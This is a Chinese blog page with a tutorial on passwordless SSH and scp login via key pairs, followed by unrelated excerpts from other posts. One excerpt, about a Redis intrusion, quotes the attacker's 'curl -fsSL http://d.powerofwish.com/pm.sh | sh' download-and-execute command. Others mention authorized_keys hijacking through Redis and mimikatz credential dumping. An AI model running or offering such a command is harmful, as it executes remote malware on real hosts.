Ssh,scp自动登陆方法 ########################### A为本地主机(即用于控制其他主机的机器) ; B为远程主机(即被控制的机器Server), 假如ip为192.168.60.110; A和B的系统都是Linux 在A上运行命令: # ssh-keygen -t rsa (连续三次回车,即在本地生成了公钥和私钥,不设置密码) # ssh root@192.168.60.110 "mkdir .ssh; chmod 0700 .ssh" (需要输入密码) # scp ~/.ssh/id_rsa.pub root@192.168.60.110:.ssh/id_rsa.pub (需要输入密码) 在B上的命令: # touch /root/.ssh/authorized_keys2 (如果已经存在这个文件, 跳过这条) # cat /root/.ssh/id_rsa.pub >> /root/.ssh/authorized_keys2 (将id_rsa.pub的内容追加到 authorized_keys2 中) 回到A机器: # ssh root@192.168.60.110 (不需要密码, 登录成功) 如果能保护好自己的私钥, 这种方法相对在shell上输入密码, 要安全一些 ############################################## 深入一点点: 从表面上简单的理解一下登录的过程, 首先 ssh-keygen -t rsa 命令生成了一个密钥和一个公钥, 而且密钥可以设置自己的密码,可以把密钥理解成一把钥匙, 公钥理解成这把钥匙对应的锁头,把锁头(公钥)放到想要控制的server上, 锁住server, 只有拥有钥匙(密钥)的人, 才能打开锁头, 进入server并控制,而对于拥有这把钥匙的人, 必需得知道钥匙本身的密码,才能使用这把钥匙 (除非这把钥匙没设置密码), 这样就可以防止钥匙被人配了(私钥被人复制) 当然, 这种例子只是方便理解罢了, 拥有root密码的人当然是不会被锁住的, 而且不一定只有一把锁(公钥), 但如果任何一把锁, 被人用其对应的钥匙(私钥)打开了, server就可以被那个人控制了 所以说, 只要你曾经知道server的root密码, 并将有root身份的公钥放到上面, 就可以用这个公钥对应的私钥"打开" server, 再以root的身分登录, 即使现在root密码已经更改! 如果想控制n个机器, 那就需要n对钥匙(密钥和公钥), ssh-keygen 命令可以随意更改钥匙对的名字, 比如: [root@wwy .ssh]# ssh-keygen -t rsa Generating public/private rsa key pair. Enter file in which to save the key (/root/.ssh/id_rsa): /root/.ssh/id_rsa_192.168.102.12 ...... 这样私钥和公钥的名字分别就是: id_rsa_192.168.102.12 和 id_rsa_192.168.102.12.pub 然后将 id_rsa_192.168.102.12.pub 文件的内容, 追加到sever的 ~/.ssh/authorized_keys2 文件中, 最后, 在本地用ssh命令的 -i 参数指定本地密钥, 并登录: # ssh -i /root/.ssh/id_rsa_192.168.102.12 192.168.102.12 如果密钥设置了密码, 就用密钥的密码登录, 没设密码, 就直接登录进去了 scp也是一样的 如: scp -i /root/.ssh/id_rsa./xxx 192.168.102.158:/home/wwy/bak
最近主机受到攻击,原因可能是redis集群没有设置密码(因为快过期了,不想搞得太复杂就没设),然后被人家搞事情了,就被人一把set了些执行脚本,形如curl -fsSL http://d.powerofwish.com/pm.sh | sh,真的是猥琐啊,我登上主机一看,简直是猥琐至极,不能忍了啊。
今天发现我的Kali版本是2017版,而Kali最新版已经到了2020,于是就打算重新安装一下,顺便水一篇文章,供新手参考
其实是这样的,昨天我和一个朋友聊天,他说他自己有一台云服务器运行了 Redis 数据库,有一天突然发现数据库里的数据全没了,只剩下一个奇奇怪怪的键值对,值看起来像一个 RSA 公钥的字符串,他以为是误操作删库了,幸好自己的服务器里没啥重要的数据,也就没在意。
经常在服务器程序(脚本)里面,或在命令行中,执行ssh,scp命令,会碰到要求密码的情况,很不方便!
(一) 安装环境 VMware® Workstation 12 Pro,安装到物理机的话还需要做个U盘启动盘 (二) 下载 https://www.centos.org/download/
1.修改my.ini中的路径,改成你解压完成后,data文件夹存在的目录; 数据的存放目录要比安装目录多一个\data (其他的内容不要动)
我这个bug,和网上广为流传的不一样,所以如果网上那些方法解决不了不妨可以看看我的:
问题:新建用户无法远程登陆桌面,报错 User Profile Serives服务登录失败,无法加载用户配置文件
很早以前就装了虚拟机,现在终于装上了Linux。虽然机子的配置还不错,虚拟机一般也不会特别卡,但是来回切换有时也是一件十分令人头疼的事情。虽然说不卡,但是CPU占用率还是很高的。也十分耗电。所以自从听说了有Xshell这个神器之后 我就开始对他进行了相关的钻研。(出现问题请直接往下拉。)
MySQL是一个通用的开源关系数据库,用于在Python Web应用程序中创建,读取,更新和删除数据。本文让我们学习如何在Ubuntu 18.04.4 LTS上安装MySQL,然后在命令行客户端中运行一些SQL查询。
只是想记录一下第一次买云服务器,哈哈。其实也是临时起意,想着买个服务器以后也能够搭建自己的博客玩玩。
下载地址:https://dev.mysql.com/downloads/mysql/
最近开始用mpvue框架,所以遇到了一些坑,这篇文章记录下关于input组件的一个坑。老司机请略过。 小程序里做一个登录页,输入手机号和密码进行登录。很简单吧,用了iview之后页面很快撸出来了,但是点击输入框敲打键盘之后发现无论输什么东西全部都输不进去,这尼玛什么情况。预览到手机上进行同样的输入竟然是可以的。
平时工作过程中,对于远程连接Linux,我们通常会使用SSH工具如:putty、xshell等,对于mysql、mongodb数据库管理通常会使用Navicat、Dbeaver这类工具,redis则有RedisDesktopManager,部分软件可能还需要破解才能使用。每次都要安装来安装去、安装多个软件,这样不免有些繁琐。那么有没有一款工具可以提供一站式管理呢,答案是有的。mayfly-go就是最近比较火的,一款开源的web版linux、mysql、redis、mongo统一管理操作平台。
1、因为网易限制,第三方邮件客户端登陆网易邮箱必须用授权码登陆。 浏览器登录mail.163.com (126邮箱:mail.126.com) ,点击路径:“设置” >> “POP3/SMTP/IMAP” 。
新环境下先安装 jdk8。 参考《alicloud linux3安装Jdk》下载安装。
Gogs的目标是打造一个最简单、最快速和最轻松的方式搭建自助Git服务。使用Go语言开发使得Gogs能够通过独立的二进制分发,并且支持Go语言支持的 所有平台,包括Linux、Mac OS X、Windows以及 RM平台。
攻击:kali Linux 2020.3 靶机:Windows Server 2008 R2 x64 下面详细讲述测试的过程。
腾讯新出了一个 Donut 多端框架,可以直接将微信小程序转成 ios 和 安卓 app,小程序开发者工具里也集成了 app 相关升级、调试和打包的功能,具体的可以参考官方文档。
变量值:D:\software\programming\environment\mysql-8.0.29-winx64 // bin目录的上级目录
我操作redis的时候没设置密码就允许外部访问了,很轻易的被入侵了,通过redis修改了authorized_keys文件中实现免密登陆,看了下ip有韩国和美国的
“数据库未初始化,密码没设置。你需要设置MYSQL_ROOT_PASSWORD, MYSQL_ALLOW_EMPTY_PASSWORD and MYSQL_RANDOM_ROOT_PASSWORD三个中的任意一项”
安装VMware,使用三台 Ubuntu18.04 虚拟机进行集群搭建,下面是每台虚拟机的规划:
最近在学习node.js,少不得要跟数据库打交道,于是打算安装一个数据库软件,在mongedb和mysql之间选择了mysql。作为一个数据库新人不敢评论孰好孰坏,最后选择mysql纯属因为公司在用mysql,而且有个数据库大神可以指导学习。按照网上的教程,可能是新版本的原因,关于root密码重置总是有一些问题,所以结合自己的安装过程就有了此篇博客,好了,废话不多说,下面进入正题。
翻译过来就是windows凭证编辑器,可以完成抓取内存中的密码,或者说可以任意操纵认证信息
公司的登录模块也从Session切换到JWT挺长一段时间了,抽时间来总结一下遇到的问题以及解决方案.
在接手同事的容器化代码和自动部署代码之后发现了自己很大的问题,那就是对 Linux 的脚本和一些常用的命令还不是很熟悉,经常要去查命令的用法,于是决定还是开个分类每周一篇文章来记录一下每天用到或者见到的命令,算是一种笔记吧!
---------------------------------接Part 5------------------------------
启动完之后。我们进入数据库,验证数据库内容,看jumpserver数据是否写入到数据库中的。
Windows Server 2022 已经支持通过命令完成默认 WSL 安装了,但是博主通过wsl --install,出来的只有 howto 的帮助信息。
由于能力有限,系列文章难免会存在错误或者遗漏,如果您有任何建议,可以在对应的文章下留言或者私信给“悦专栏”公众号,我们会第一时间进行反馈。
重装了一下系统,装了CentOS 7,但是CentOS 7下默认没有安装MySQL,有MariaDB数据库,网上的解释是:
pdo连接数据库的有点是能实现不同数据库之间的转换,而且有事务功能的回滚,更有pdo::prepare();pdo:::execute()函数的预处理查询,所以我个人认为pdo的功能还是比较强大的,所有这篇日志只为我自己而写,希望看到这篇日志的兄弟们能对你们有所帮助。
https://segmentfault.com/a/1190000019212628
周日下午闲来无聊准备折腾一下宿舍里的垃圾路由器斐讯k2 原本只是听说过,但没自己弄过,尝试着自己刷一下,我这里尝试的是高恪(读作kè) 本来以为要去找远景软件,找了一圈神他妈远景,是恩山
在前面的文章中已经介绍了如何在Centos下安装 Docker,本文就不多做介绍。直接开始说如何使用 Docker 安装 MySQL。
安装完成后重启mysql服务,查看状态是 Active: active (running) ,说明启动成功
ProxyChains是一款Linux系统下的代理工具,由于很多优秀的程序位于GitHub社区,使用国内服务器部署GitHub上面的程序时,经常会在拉取安装包时下载超时失败,或是访问国外网站非常慢,例如用git、wget等等,这个时候就可以通过proxychain工具来使用socks或http代理进行网络加速访问。
现在很多服务器都封禁了25端口,导致博客的邮件通知没法运行,借鉴vps侦探的文章,搭建了msmtp发送邮件。
mimikatz是个好东西,它的功能很多,最重要的是能从 lsass.exe进程中获取windows的账号及明文密码——这是以前的事了,微软知道后已经准备了补丁,lsass进程不再保存明文口令。Mimikatz 现在只能读到加密后的密码。
https://cloud.tencent.com/document/product/560/36207
在Git Bash中输入 $ ssh-keygen -t rsa -C "你的邮箱"
近日,第三方合作伙伴再次提到该高危安全问题,我依然自信的解释,与我们平台无关,应与openssl自身配置支持v1.1有关,但此问题必须得到解决,抱着半信半疑的态度,难道是代码问题?于是乎,开始探索之路,本文以ASP.NET Core 3.1.20作为示例
最近搞了个小项目刚刚好部署一下,记录一下部署过程 我这里是这发布Docker hub 如果你没设置为 private 别人是可以拉到的,如果需要私有则直接用Idea进行连接远程服务器docker设置docker一些配置即可,本片文章就不说这个.
之前老看见有人讨论这个玩意,然后心血来潮收了10个优惠码(100收的),开了个车,买了5个5 NCF、5个5C NFC;加上我一共7个人,我就要了俩5,下面价格加上每个人平摊的转运费和码字钱大概是35元差不多,寄到他们手里在加上十几块快递费就是最终费用了。
最牛的一个: Mac 下 Flash 一直是个痛,只有用虚拟机的 Win 7 才勉强敢看,但拿 Win 10 试了一盘三国杀+两部腾讯视频(拿 Mac 看过腾讯视频的都懂),风扇居然没转出多大声。。。
13、这边磁盘的设置非常影响体验,我的选择是使性能最大化,不用过于纠结,觉得没设置好以后随时可以重新创建一个新的虚拟机
领取专属 10元无门槛券
手把手带您无忧上云